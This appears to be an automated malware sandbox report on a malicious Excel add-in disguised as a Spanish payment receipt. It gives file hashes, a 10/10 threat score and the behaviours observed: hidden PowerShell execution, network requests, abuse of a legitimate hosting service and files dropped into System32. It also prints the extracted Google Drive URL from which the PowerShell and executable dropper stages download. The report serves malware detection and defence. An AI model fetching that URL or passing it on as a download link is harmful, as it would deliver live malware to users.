Overview

overview

10

Static

static

1

Comprobant...o.xlam

windows7-x64

10

Comprobant...o.xlam

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Comprobantedepago.xlam

  • Size

    699KB

  • Sample

    241023-lxrcvstcpf

  • MD5

    1de5993784350cdba2bdc8824591a452

  • SHA1

    921e7dd625709bbef00860eb23c9bc279e3483d6

  • SHA256

    d60d2060e90ae46091f0d4d2cd819c87ab7832b50ed4ba05912281ec084d7748

  • SHA512

    db4e29d683e16fde32f14d5e9229b29ca20fac16f247f36b3dfd69f137bddadd0d4f6f39cbe5b0c07b26d6c979c1bfb8d97dd93bf8c6852f7ec3e7069e976cfa

  • SSDEEP

    12288:TTDYEkIOk9iewJ5IU5Y3LoIfpo3Scp1ixHXmYWN0jPvxfScWgGYDpBY3:fDYVkQT5IP7oXCcfixBWN0jPvxfCag3

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp

exe.dropper

https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp

Targets

    • Target

      Comprobantedepago.xlam

    • Size

      699KB

    • MD5

      1de5993784350cdba2bdc8824591a452

    • SHA1

      921e7dd625709bbef00860eb23c9bc279e3483d6

    • SHA256

      d60d2060e90ae46091f0d4d2cd819c87ab7832b50ed4ba05912281ec084d7748

    • SHA512

      db4e29d683e16fde32f14d5e9229b29ca20fac16f247f36b3dfd69f137bddadd0d4f6f39cbe5b0c07b26d6c979c1bfb8d97dd93bf8c6852f7ec3e7069e976cfa

    • SSDEEP

      12288:TTDYEkIOk9iewJ5IU5Y3LoIfpo3Scp1ixHXmYWN0jPvxfScWgGYDpBY3:fDYVkQT5IP7oXCcfixBWN0jPvxfCag3

    Score
    10/10
    discoveryexecution

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks